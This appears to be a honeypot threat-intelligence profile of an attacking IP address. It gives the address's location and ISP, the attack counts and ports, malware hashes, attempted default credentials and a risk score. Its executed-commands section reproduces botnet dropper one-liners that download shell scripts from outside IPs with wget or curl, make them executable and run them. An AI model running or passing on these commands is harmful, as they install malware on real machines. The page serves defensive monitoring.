⚠TROYANOSYVIRUS
Active Threat β€’ CRITICAL

64.89.161.198

First Detection2/2/2026
Last Activity2/23/2026
ISPOVH SAS
🎯
180
Total Attacks
πŸ”Œ
25
Ports
πŸ“‘
7
Attack Types
🦠
5
Malware

Geolocation

Country
πŸ‡ΈπŸ‡¬ Singapore
City
Unknown
ASN
AS16276
ISP
OVH SAS

Attack Types

h0neytr4p
cowrie
honeyaml
dionaea
tanner
honeytrap
ciscoasa

Attacked Ports

2380814431443300030013002300330043005300630073010312833014000400540634444+5

Associated Malware

71db23fcf11f644479c6...β†’c1c4ba9b177635033c28...β†’db28e0588b7197dd095d...β†’e3b0c44298fc1c149afb...β†’e901d9ee2be164b109aa...β†’

Attempted Credentials

πŸ”admin/admin
11x
πŸ”root/root
6x

Executed Commands

$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh2x
$echo SUCCESS2x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.128.118.140/run.sh; curl -O http://45.128.118.140/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh1x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh telnet1x

Risk Assessment

95
/100
LowMediumHighCritical